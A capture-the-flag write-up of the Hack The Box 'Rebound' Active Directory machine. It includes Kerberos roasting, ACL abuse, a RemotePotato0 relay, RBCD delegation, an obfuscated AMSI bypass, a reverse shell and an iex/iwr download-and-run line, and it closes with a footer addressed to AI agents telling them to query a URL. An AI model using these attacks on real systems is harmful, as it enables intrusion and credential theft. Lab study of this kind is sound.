# HTB - Rebound
## Description
Rebound is an Insane Windows machine featuring a tricky Active Directory environment. User enumeration via RID cycling reveals an AS-REP-roastable user, whose TGT is used to Kerberoast another user with a crackable password. Weak ACLs are abused to obtain access to a group with FullControl over an OU, performing a Descendant Object Takeover (DOT), followed by a ShadowCredentials attack on a user with winrm access. On the target system, cross-session relay is leveraged to obtain the NetNTLMv2 hash of a logged-in user, which, once cracked, leads to a gMSA password read. Finally, the gMSA account allows delegation, but without protocol transition. Resource-Based Constrained Delegation (RBCD) is used to impersonate the Domain Controller, enabling a DCSync attack, leading to fully elevated privileges.
## Enumeration
***
> IP Address: 10.10.11.231
**Nmap Scan**
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-port-scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
5985/tcp open wsman
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nmap -p53,88,135,139,389,445,5985 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-31 20:41:24Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-31T20:43:17+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m01s
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Host script results:
| smb2-time:
| date: 2024-10-31T20:41:42
|_ start_date: N/A
|_clock-skew: 7h00m01s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
```
**Summary**
```R
* Open ports: 53,88,135,139,445,5985
* UDP open ports: 53,88,123,389
* Services: DNS - RPC - SMB - KERBEROS - LDAP - NTP - winRM
* Important notes: DNS:dc01.rebound.htb - Domain: rebound.htb
```
Before I start, I'd prefer to update `/etc/hosts` file to prevent further issues and to easily communicate with the box without typing the IP each time.
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $sudo sh -c "echo '$ip dc01 dc01.rebound.htb rebound.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $tail -n1 /etc/hosts
10.10.11.231 dc01 dc01.rebound.htb rebound.htb
```
**Service Enumeration**
**DNS Enumeration**
It's always good to try `Zone transfer`, but it hardly-ever succeeds
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $dig axfr @10.10.11.231 dc01.rebound.htb
; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> axfr @10.10.11.231 dc01.rebound.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
```
**RPC & SMB Enumeration**
I didn't get anything interesting from RPC, SMB would be the next
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $rpcclient -U '%' $ip -c srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $rpcclient -U '%' $ip -c enumdomusers
result was NT_STATUS_ACCESS_DENIED
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $rpcclient -U '%' $ip -c enumdomgroups
result was NT_STATUS_ACCESS_DENIED
```
I can see, I have `Read` access on `Shared` share but unfortunately it's empty
```bash
─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u '' -p '' --shares
SMB 10.10.11.231 445 DC01 [+] rebound.htb\:
SMB 10.10.11.231 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u 'guest' -p '' --shares
SMB 10.10.11.231 445 DC01 [+] rebound.htb\guest:
SMB 10.10.11.231 445 DC01 [*] Enumerated shares
SMB 10.10.11.231 445 DC01 Share Permissions Remark
SMB 10.10.11.231 445 DC01 ----- ----------- ------
SMB 10.10.11.231 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.231 445 DC01 C$ Default share
SMB 10.10.11.231 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.231 445 DC01 NETLOGON Logon server share
SMB 10.10.11.231 445 DC01 Shared READ
SMB 10.10.11.231 445 DC01 SYSVOL Logon server share
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $impacket-smbclient rebound.htb/'guest':''@dc01
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
# shares
ADMIN$
C$
IPC$
NETLOGON
Shared
SYSVOL
# use Shared
# ls
drw-rw-rw- 0 Fri Aug 25 17:46:36 2023 .
drw-rw-rw- 0 Fri Aug 25 17:46:36 2023 ..
```
When attempting RID brute with an anonymous login, It failed but succeeded with `guest` account.
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u '' -p '' --rid-brute 10000
SMB 10.10.11.231 445 DC01 [+] rebound.htb\:
SMB 10.10.11.231 445 DC01 [-] Error connecting: LSAD SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u 'guest' -p '' --rid-brute 10000
SMB 10.10.11.231 445 DC01 [+] rebound.htb\guest:
SMB 10.10.11.231 445 DC01 498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.231 445 DC01 500: rebound\Administrator (SidTypeUser)
SMB 10.10.11.231 445 DC01 501: rebound\Guest (SidTypeUser)
SMB 10.10.11.231 445 DC01 502: rebound\krbtgt (SidTypeUser)
SMB 10.10.11.231 445 DC01 512: rebound\Domain Admins (SidTypeGroup)
SMB 10.10.11.231 445 DC01 513: rebound\Domain Users (SidTypeGroup)
SMB 10.10.11.231 445 DC01 514: rebound\Domain Guests (SidTypeGroup)
SMB 10.10.11.231 445 DC01 515: rebound\Domain Computers (SidTypeGroup)
SMB 10.10.11.231 445 DC01 516: rebound\Domain Controllers (SidTypeGroup)
SMB 10.10.11.231 445 DC01 517: rebound\Cert Publishers (SidTypeAlias)
SMB 10.10.11.231 445 DC01 518: rebound\Schema Admins (SidTypeGroup)
SMB 10.10.11.231 445 DC01 519: rebound\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.231 445 DC01 520: rebound\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.231 445 DC01 521: rebound\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.231 445 DC01 522: rebound\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.231 445 DC01 525: rebound\Protected Users (SidTypeGroup)
SMB 10.10.11.231 445 DC01 526: rebound\Key Admins (SidTypeGroup)
SMB 10.10.11.231 445 DC01 527: rebound\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.231 445 DC01 553: rebound\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.231 445 DC01 571: rebound\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.231 445 DC01 572: rebound\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.231 445 DC01 1000: rebound\DC01$ (SidTypeUser)
SMB 10.10.11.231 445 DC01 1101: rebound\DnsAdmins (SidTypeAlias)
SMB 10.10.11.231 445 DC01 1102: rebound\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.231 445 DC01 1951: rebound\ppaul (SidTypeUser)
SMB 10.10.11.231 445 DC01 2952: rebound\llune (SidTypeUser)
SMB 10.10.11.231 445 DC01 3382: rebound\fflock (SidTypeUser)
SMB 10.10.11.231 445 DC01 5277: rebound\jjones (SidTypeUser)
SMB 10.10.11.231 445 DC01 5569: rebound\mmalone (SidTypeUser)
SMB 10.10.11.231 445 DC01 5680: rebound\nnoon (SidTypeUser)
SMB 10.10.11.231 445 DC01 7681: rebound\ldap_monitor (SidTypeUser)
SMB 10.10.11.231 445 DC01 7682: rebound\oorend (SidTypeUser)
SMB 10.10.11.231 445 DC01 7683: rebound\ServiceMgmt (SidTypeGroup)
SMB 10.10.11.231 445 DC01 7684: rebound\winrm_svc (SidTypeUser)
SMB 10.10.11.231 445 DC01 7685: rebound\batch_runner (SidTypeUser)
SMB 10.10.11.231 445 DC01 7686: rebound\tbrady (SidTypeUser)
SMB 10.10.11.231 445 DC01 7687: rebound\delegator$ (SidTypeUser)
```
I added the users I found to a wordlist to use it later
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $cat wordlists/users.list
ppaul
llune
fflock
jjones
mmalone
nnoon
ldap_monitor
oorend
ServiceMgmt
winrm_svc
batch_runner
tbrady
delegator$
```
**LDAP & Kerberos Enumeration**
I tried to query ldap anonymously but got nothing from it.
```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $ldapsearch -H ldap://10.10.11.231 -x -s sub '*' -b "DC=rebound,DC=htb"
# LDAPv3
# base with scope subtree
# filter: (objectclass=*)
# requesting: *
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090ACD, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
```
The last option now is Kerberos. With my usernames list, I can try two possible attacks, one common and one new to many people.
1. `ASREP-Roasting Attack`
2. `Kerberosting via asreproastable account`
```bash
nxc ldap dc01 -u wordlists/users.list -p '' --asreproast asrep.hashes
```
Unluckily, cracking the hash failed which made me move to the next possible attack
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt
..snip..
Status...........: Exhausted
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$jjones@REBOUND.HTB:812fbf1df8bffa65dd...2a6157
```
To perform this attack, we need the latest version of Impacket
```bash
mkdir impacket && cd impacket
python3 -m venv . && source ./bin/activate
pip3 install impacket
```
This is the option we need
## Foothold
***
I will try to get some hashes and if succeed, I will output them to a file.
```bash
python3 impacket/bin/GetUserSPNs.py rebound.htb/ -usersfile wordlists/users.list -request -no-preauth jjones -dc-ip dc01.rebount.htb
python3 impacket/bin/GetUserSPNs.py rebound.htb/ -usersfile wordlists/users.list -request -no-preauth jjones -dc-ip dc01.rebount.htb -output kerberos.hashes
```
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $hashcat -m 13100 kerberos.hashes /usr/share/wordlists/rockyou.txt
..snip..
$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$8ebcdf0e97d1de0fd18f1bd980841c97$e9d2eb41eead735aaf2a6ccd8eb3882380a2aaec21fa7a6ecea8380ebef4fd18b505a84caaf3976620b5fbd032007a6f23252bad48766d656bc03d3e2606ef901838357db952de0ac676d9890ac1b045e1a78ee3545ac0f4012fca682ce2779becd3ea481d559afb34cbe4c3807daf7f2d3e72febba1cd66756043f1dc63322a0b860f53a254b97e22efc02adcf20e861761b054023b3d7037dd6ff85e71bb6569b289c8dfc3aa29064b24e2668b346eaaa6830690e9d2f39db1ca4dc958f56221d0d3868915a258556b45647b3e77a0afbd552c6a66a7611d9132217e8d8500808d08ea0243c1754d55c6ee817d49ce4f7621e0603cc65a2c653137fd79808a2998a4a0a2d9c74629429b6334ac6a896e8e8192c642a2df9519a6cdf61db8ea3b7c70065d3548736274a89a9ca5552a3fdf06d69ce6c45eb11a6a38e0c8ad920574f0adbbe535227037e6c94043d5147723fb7b941bb29ffa8214d95476b1193fd6a91e1cb39ffb4758f198e13992d31c4c676b82d51174234392f64979e66dd506738e29048b27bf6310f2e73c7bdb8ce35b57fc7cb3c1374eed517fc83fdc51ae6de05b287ae3e25f802c364fc7a5d7cfa05711f3c97ccf8f3a64c4dc292859a90947aef6b5d1211de7f116e3aae597683e94d04f3617ca71c62986a6841a9279574c81d4964ac5858ece2086fb7bf5a3cd1913d3d18067ba230e09b7e5a24d359dd78d55ef6379a6eb17899fef7d61b9a08d7f9ebcbcdb23ff03374bbb0847d5038f99a71ddb29a5c701e50c95eea1e2f60648f4da03a3a7bc3b4849043a81ac4581a1394d9adc027b896b737dc37b20cbf7455333d6893dc9609fabc60eca77ea365c9a11296032bb47fdcabb5ccc54d5badeaca04b83c7316a75acb18df6cb38b497c8fa633caf48625577966fabb6e3f4c57c4707264c5f440d42e09f5857b138a64277616900b87dd1f635418f801e8495a6c7f03c22c62810c079d234e6ab852bc668d8d341a5ea8f3ac80daefa223586b2aa617b51cab39dc99ed4ca0ba510a296c4702b64b2326d0e0063e94d21fe697c1170ddf51c7ad5ddfc68f459ec242f5a23f4c3a4db66b30a439162e5838a1599f3de591df34e16bfd2aaaa583cd8f82bbfbacd6ba48eeecef121156689a72e5cd4cee5c16f0e8863ba4278fc588317114736229443767f97a8c44a63f4f90c2c003ba5973deee28b8f17a2708ef0ff4be67699089487effe72b484ecabbe98ac8cdfde17bee572f6fdc12eb83cc43c1fd2e65c103d98e7b1f17b443523f2c4e35d565eb38671598b59026378875380e9f3c9fb9ac25360c96b64b9bb315f87455c973334ca40d2cb7219c6ba:1GR8t@$$4u
Session..........: hashcat
Status...........: Cracked
```
Let's check the validity of these credentials. Authentication to smb worked but LDAP failed
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u ldap_monitor -p '1GR8t@$$4u'
SMB 10.10.11.231 445 DC01 [+] rebound.htb\ldap_monitor:1GR8t@$$4u
┌──[kali@parrot]─[~/HackTheBox/platform/machines/Rebound/ldapdomaindump]
└──╼ $nxc ldap dc01 -u ldap_monitor -p '1GR8t@$$4u'
LDAPS 10.10.11.231 636 DC01 [-] rebound.htb\ldap_monitor:1GR8t@$$4u
LDAPS 10.10.11.231 636 DC01 [-] LDAPS channel binding might be enabled, this is only supported with kerberos authentication. Try using '-k'.
```
It looks like it needs Kerberos authentication to be enforced, I will try again with `-k`
> I faced kerberos clock skew problem and didn't work with common solutions, so I write this script to sync with kerberos each second. "Not the best way, but it worked :)" `while True;do ntpdate 10.10.11.231;sleep 1;done`
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc ldap dc01 -u ldap_monitor -p '1GR8t@$$4u' -k
LDAPS dc01 636 DC01 [+] rebound.htb\ldap_monitor
```
With valid domain credentials, I can move to the the domain enumeration process, credentialed enumeration against LDAP, smb, and try password spray. I will start with `bloodhound.py`
```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $bloodhound-python -u 'ldap_monitor@rebound.htb' -p '1GR8t@$$4u' -ns 10.10.11.231 -d rebound.htb --zip -k
INFO: Found AD domain: rebound.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 16 users
INFO: Found 53 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.rebound.htb
INFO: Done in 00M 42S
INFO: Compressing output into 20241031191948_bloodhound.zip
```
## Lateral Movement
***
I found that two users shared the same passwords and the third was group not user.
Looking at permission on shares and files inside with `spider_plus` module but nothing interesting. I will enumerate the domain manually with `PowerView.py`
```bash
(powerview.py) ┌─[kali@parrot]─[/opt/powerview.py]
└──╼ $python3 powerview.py rebound.htb/ldap_monitor:'1GR8t@$$4u'@10.10.11.231 -k
(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainUser -Identity oorend -Properties name,ObjectSid
name : oorend
objectSid : S-1-5-21-4078382237-1492182817-2568127209-7682
(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainObjectAcl -Identity * -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7682
[2024-10-31 19:46:49] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7683
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : Self
AccessMask : 0x8
InheritanceType : None
SecurityIdentifier : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)
```
User `oorend` has `AddSelf` to `ServiceMgmt` groups, So I'm curious to see the ACLs of this group I found that it had `FullControl` over `Organisational unit (OU) Service Users`
```bash
(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainObjectAcl -Identity * -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7683
[2024-10-31 19:48:50] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : None
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : FullControl
AccessMask : 0xf01ff
InheritanceType : None
SecurityIdentifier : ServiceMgmt (S-1-5-21-4078382237-1492182817-2568127209-7683)
(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainObjectAcl -SearchBase "OU=Service Users,DC=rebound,DC=htb" -Select ObjectDN
..snip..
CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb
CN=batch_runner,OU=Service Users,DC=rebound,DC=htb
..snip..
```
When enumerating the Domain object under this OU, I found that it contains `winrm_svc` account who is a member of `Remote Management users`, So he can access the machine via `winRM`
The Exploitation path is: `Abuse AddSelf` => `Abuse FullControl Inhertiance` => `ChangePassword` of `winrm_svc` or `shadow Credentials`
```bash
python3 powerview.py rebound.htb/oorend:'1GR8t@$$4u'@10.10.11.231 -k
Add-DomainGroupMember -Identity "ServiceMgmt" -Members oorend
```
```bash
Add-DomainObjectAcl -TargetIdentity "OU=Service Users,DC=rebound,DC=htb" -PrincipalIdentity oorend -Rights fullcontrol
or
./bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --dc-ip 10.10.11.231 -k --host dc01.rebound.htb add genericAll "OU=Service Users,DC=rebound,DC=htb" oorend
```
```powershell
Set-DomainUserPassword -Identity winrm_svc -AccountPassword 'NewPass@w0rd123!!'
Or
net rpc password winrm_svc 'NewPass@w0rd123!!' -U rebound.htb/oorend%'1GR8t@$$4u' -S 10.10.11.231
```
Access the machine
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $evil-winrm -i dc01 -u winrm_svc -p 'NewPass@w0rd123!!'
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>
```
> User Flag: 46bad1cb1f3b5f3da2945c6f38c92c7c
## Privilege Escalation
***
The password and ACLs are resettled, So I must harry and establish persistent shell
```powershell
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.3 lport=443 -f psh -o shell.ps1
sudo msfconsole -x 'use exploit/multi/handler;set lhost 10.10.16.3;set lport 443;set payload windows/x64/meterpreter/reverse_tcp; run'
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)
iex(iwr -UseBasicParsing 10.10.16.3/shell.ps1)
```
After getting a shell in `metasploit`, I want to query logged-on users but it didn't give me anything, However when using `logon type 9` (network logon), it shows that `tbrady` user is logged on.
Looking into Bloodhound for the privileges of that use, I found that it can read `GMSA` account hash
To get this account, I can use `cross-session`attack, steal its `NTLMv2` hash, and try to crack it.
I used this repo to perform the attack: [antonioCoco/RemotePotato0: Windows Privilege Escalation from User to Domain Admin.](https://github.com/antonioCoco/RemotePotato0)
Following this repo instruction, I get these two commands.
```bash
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999 &
.\RemotePotato0.exe -m 2 -s 1 -x 10.10.16.3 -p 9999
```
Trying to crack the hash using `hashcat` and succeeded :))
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $hashcat -m 5600 hashes/ntlmv2.hash /usr/share/wordlists/rockyou.txt
TBRADY::rebound:0a5c6a4a69ec25ec:45e00b50ae6b1770ce5783b45df11a7b:010100000000000015d8a3db012cdb015057b803f05c13760000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e006800740062000700080015d8a3db012cdb0106000400060000000800300030000000000000000100000000200000be29ef78de83964dfabe9aac638f7dda5b4d0fcbeaa670fed3addf513a647f820a00100000000000000000000000000000000000090000000000000000000000:543BOMBOMBUNmanda
Session..........: hashcat
Status...........: Cracked
```
Now, I can read `GMSA` hash
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc ldap dc01 -u TBRADY -p '543BOMBOMBUNmanda' --gmsa -k
LDAPS dc01 636 DC01 [+] rebound.htb\TBRADY:543BOMBOMBUNmanda
LDAPS dc01 636 DC01 [*] Getting GMSA Passwords
LDAPS dc01 636 DC01 Account: delegator$ NTLM: ed8d95b20400dce3355419f277d3421c
```
I want to enumerate the `delegate` of the account `delegator$`
```bash
(impacket) ┌─[kali@parrot]─[/opt/impacket/bin]
└──╼ $findDelegation.py rebound.htb/'delegator$'@dc01 -hashes :ed8d95b20400dce3355419f277d3421c -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName AccountType DelegationType DelegationRightsTo SPN Exists
----------- ----------------------------------- -------------- --------------------- ----------
delegator$ ms-DS-Group-Managed-Service-Account Constrained http/dc01.rebound.htb No
```
From here, I stopped and couldn't go any further. the `constrained delegation` here is for `http` service and I couldn't request a ticket impersonating the `administrator` or the `DC01`, So the following attack path is very complicated and I will try to simplify it as I can.
1. Since I already have control of `delegator$` account, I can perform `RBCD` and add `ldap_monitor` to `ms-ds-allowtoactonbehalfofotheridentity` list, so `ldap_monitor` can impersonate any user in the domain
2. Requesting Service Ticket as `ldap_monitor` impersonating the `DC01`, so the ticket will have `forwardable` flag
3. Using this ticket to request another ticket instead of `s4u2self` and impersonate the DC
```bash
rbcd.py 'rebound.htb/delegator$' -hashes :ed8d95b20400dce3355419f277d3421c -k -delegate-from ldap_monitor -delegate-to 'delegator$' -action write -dc-ip dc01.rebound.htb -use-ldaps
findDelegation.py 'rebound.htb/delegator$' -dc-ip 10.10.11.231 -k -hashes :ed8d95b20400dce3355419f277d3421c
getST.py 'rebound.htb/ldap_monitor:1GR8t@$$4u' -spn browser/dc01.rebound.htb -impersonate 'DC01$'
getST.py -spn http/dc01.rebound.htb -impersonate 'DC01$' 'rebound.htb/delegator$' -hashes :ed8d95b20400dce3355419f277d3421c -additional-ticket 'DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache'
```
Dumping `ntds.dit` secrets
```bash
(impacket) ┌─[✗]─[kali@parrot]─[/opt/impacket/bin]
└──╼ $nxc smb dc01 -k --use-kcache --ntds --user administrator
SMB dc01 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB dc01 445 DC01 [+] rebound.htb\DC01$ from ccache
SMB dc01 445 DC01 [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB dc01 445 DC01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB dc01 445 DC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
```
Access the machine as an administrator
```bash
(impacket) ┌─[kali@parrot]─[/opt/impacket/bin]
└──╼ $evil-winrm -i dc01 -u administrator -H 176be138594933bb67db3b2572fc91b8
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
56bf9cc0fa746883f65axxxxxxxxxxxxx
```
> Root Flag: 56bf9cc0fa746883f65ab822f3ceb779
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://blind0bandit.gitbook.io/blog/windows-machines/insane/htb-rebound.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.